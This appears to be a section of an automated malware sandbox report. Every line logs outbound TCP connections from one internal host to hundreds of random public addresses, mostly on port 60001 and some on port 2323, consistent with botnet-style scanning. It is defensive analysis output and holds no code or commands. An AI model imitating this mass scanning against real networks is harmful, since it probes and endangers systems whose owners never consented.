    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 126.170.151.136:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 72.0.2.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 63.70.140.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 75.100.121.18:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 205.171.2.70:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 206.110.173.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 34.128.162.61:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 52.85.76.115:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 24.195.127.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 199.79.30.112:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.148.118.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.248.195.66:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 177.53.110.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 204.178.227.18:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 117.171.17.166:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 31.177.78.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 43.34.137.26:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 23.141.147.200:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 166.124.128.137:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 84.176.187.228:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 92.153.86.234:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 85.125.69.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 138.50.211.57:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 113.74.47.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 149.37.39.124:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.60.114.131:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 50.6.156.219:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 57.246.114.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.2.59.203:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 77.132.108.192:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 152.148.225.179:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 184.190.239.68:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 63.200.23.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 39.64.169.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 12.110.5.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 220.86.84.11:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 86.117.55.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 70.253.237.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 143.38.43.135:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 170.212.36.250:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 57.252.173.182:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 188.119.53.17:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 158.153.215.0:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 210.46.213.169:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 51.186.72.158:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 198.102.110.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 102.163.62.124:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 41.247.130.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 171.67.90.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 82.202.76.99:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 66.235.210.221:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 188.214.188.40:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.198.6.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 126.99.207.92:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 200.221.58.2:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.225.196.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 199.92.73.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 221.7.167.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 47.215.127.174:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 189.130.166.117:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 72.185.84.71:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 221.207.206.217:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 87.234.168.83:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 154.130.195.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 90.52.147.221:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 64.0.122.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 35.43.102.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 170.124.49.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 106.11.111.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 171.60.230.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 121.244.56.246:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 165.78.100.196:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 47.106.98.137:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 64.213.153.190:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 189.27.111.132:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 131.46.139.231:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 219.14.29.160:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 216.59.183.87:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 102.154.131.249:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 168.176.92.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 42.39.49.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 91.240.153.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 100.172.172.94:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 162.122.23.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 52.59.84.219:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 206.104.250.66:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.82.162.1:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 64.229.118.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 98.173.78.95:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 75.137.78.52:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 105.109.202.115:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 81.26.181.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 78.217.243.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 90.226.19.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 134.178.185.141:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 167.131.112.47:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 115.142.189.87:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 59.176.56.235:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 46.61.249.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 103.110.188.157:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.98.203.108:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 8.71.110.201:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 146.194.217.45:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 189.38.30.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 193.249.15.99:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 63.62.99.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 39.49.251.60:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 123.31.56.31:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 221.160.230.38:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 206.50.2.71:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 118.41.179.90:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 59.202.82.124:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 97.15.150.202:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 91.154.241.60:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.219.78.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 175.163.14.13:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 112.77.204.112:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 157.143.228.28:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 116.148.71.50:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 177.31.69.210:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 85.180.30.10:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 121.51.75.206:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 80.75.244.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 24.150.191.118:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 131.228.107.114:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 96.234.22.205:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 113.203.177.210:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 78.239.80.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 197.215.96.208:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 141.195.211.17:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 128.43.161.144:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 154.53.188.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 62.170.183.250:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.238.156.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.77.15.115:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 178.209.159.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 53.132.129.58:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 183.183.11.238:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 54.148.161.252:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 102.217.4.229:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 52.139.214.150:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 41.10.131.159:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 37.103.208.82:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 165.243.232.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 94.131.208.145:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 85.204.177.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 180.38.146.71:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 13.121.119.204:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 181.70.105.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 42.186.64.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.94.208.140:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.101.15.171:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 143.217.33.149:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.60.104.67:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 159.103.232.42:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 200.16.172.228:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 134.180.135.101:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 64.31.82.27:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 123.184.13.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 168.30.71.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 79.105.113.98:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 159.45.93.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 1.249.253.49:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 191.71.122.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 138.130.54.244:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.95.156.134:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 204.34.202.218:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 27.129.17.238:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 139.119.174.174:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 19.11.209.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 181.163.225.103:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 146.166.66.176:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 53.241.68.169:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 165.224.32.1:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 148.2.46.247:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 223.31.146.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 53.156.73.99:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 67.26.138.164:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 204.30.172.199:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 13.106.158.158:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 64.167.19.104:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 36.59.194.9:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 18.201.153.183:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 80.30.148.99:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 150.115.74.245:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 126.151.9.173:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 219.45.25.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 221.19.192.72:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 63.70.237.96:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 118.230.56.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 209.161.119.8:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 167.239.42.199:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 140.103.201.231:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 203.226.54.209:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 220.253.77.70:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 93.11.192.15:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 42.251.10.22:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 65.40.166.222:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 220.101.246.152:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 94.242.40.15:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 180.218.10.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.180.119.4:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 12.100.117.69:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 115.98.131.89:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 144.67.12.188:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 66.102.253.38:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 43.200.1.169:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 108.1.197.129:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 112.180.117.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 219.53.241.65:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 106.200.172.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 110.173.153.24:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 150.50.5.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 31.64.215.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 25.114.69.244:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 156.130.199.45:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 212.30.94.32:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 51.82.65.48:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.168.22.74:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 47.169.173.105:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.77.199.210:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.197.143.24:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 75.150.46.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 34.15.98.110:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 53.136.174.175:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 212.224.185.227:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 79.15.22.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 182.123.65.120:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 34.201.20.226:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 210.19.6.220:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 142.113.189.218:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 79.98.85.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 168.217.32.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 209.58.191.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 200.141.124.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 141.73.85.230:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 170.134.204.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 104.78.168.74:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 37.201.110.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 191.210.68.123:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 194.248.122.245:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 45.122.197.5:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 45.34.197.199:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 121.212.24.218:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 76.53.216.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 217.99.14.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 67.122.179.163:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 86.246.199.204:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 193.31.73.12:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 141.204.103.150:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 92.119.251.194:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 14.219.26.52:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 187.104.114.241:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 70.1.151.55:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 197.87.198.148:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 194.72.227.225:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 105.17.79.177:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 216.132.187.213:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 57.137.242.73:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 128.33.169.225:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 81.137.41.169:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 182.110.70.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 141.113.214.236:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 75.29.209.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 44.108.121.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 201.43.65.103:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 49.83.194.98:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 208.176.91.92:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 110.100.126.207:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 176.214.109.243:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 121.105.5.113:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 50.144.52.237:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 126.87.112.223:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 86.0.43.3:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 17.213.174.148:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 120.167.104.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 87.142.140.186:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 191.23.91.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 134.174.7.104:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 81.213.21.44:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 139.194.184.58:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 143.155.238.193:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 40.200.62.127:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 62.10.204.3:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 84.104.177.244:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 184.190.105.131:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 38.190.99.240:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 100.218.160.21:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 31.205.184.8:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 179.117.184.102:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 137.251.37.14:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 178.46.13.39:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 171.97.185.187:2323
    Source: global trafficTCP traffic: 192.168.2.23:4898 -> 68.20.51.239:2323
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 57.221.218.102:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 54.161.244.80:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 213.0.223.166:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 87.252.199.25:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 59.171.40.175:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 152.80.27.41:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 105.23.66.109:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 183.73.50.249:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 89.134.84.211:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 183.228.49.28:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 136.46.203.132:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 13.246.136.185:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.201.217.28:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 202.202.101.71:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 65.121.192.226:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 147.3.86.78:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 193.71.169.54:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 31.230.12.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 96.176.60.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 5.52.208.142:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 72.232.230.16:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 132.132.234.242:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 105.177.161.121:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.192.56.6:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 146.142.75.245:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 218.121.252.51:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 182.140.42.35:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 188.68.169.97:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 217.192.42.234:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 196.208.44.94:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 44.12.46.184:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 185.127.7.37:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 130.171.30.131:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 143.46.187.53:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 126.25.64.104:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 92.45.157.115:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 190.37.37.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 120.227.176.79:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 144.88.159.127:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 1.41.138.174:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 32.120.159.114:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 211.35.167.140:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 65.245.143.215:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 41.194.149.93:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 198.51.157.210:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 208.13.75.193:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 178.45.246.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 46.162.201.113:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 1.189.255.102:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 176.7.191.7:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 216.77.187.138:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 110.142.149.26:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 68.51.176.240:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 179.194.178.146:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 146.128.68.133:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 136.51.218.76:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 146.210.187.255:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 24.67.189.181:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 199.191.253.172:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 196.104.229.232:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 207.255.133.225:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 119.30.177.23:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 80.86.89.77:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 145.106.146.197:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 219.159.121.69:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 153.51.119.151:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 178.84.97.214:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 13.162.54.253:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 175.86.221.139:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 121.84.53.180:60001
    Source: global trafficTCP traffic: 192.168.2.23:4130 -> 9.158.166.108:60001
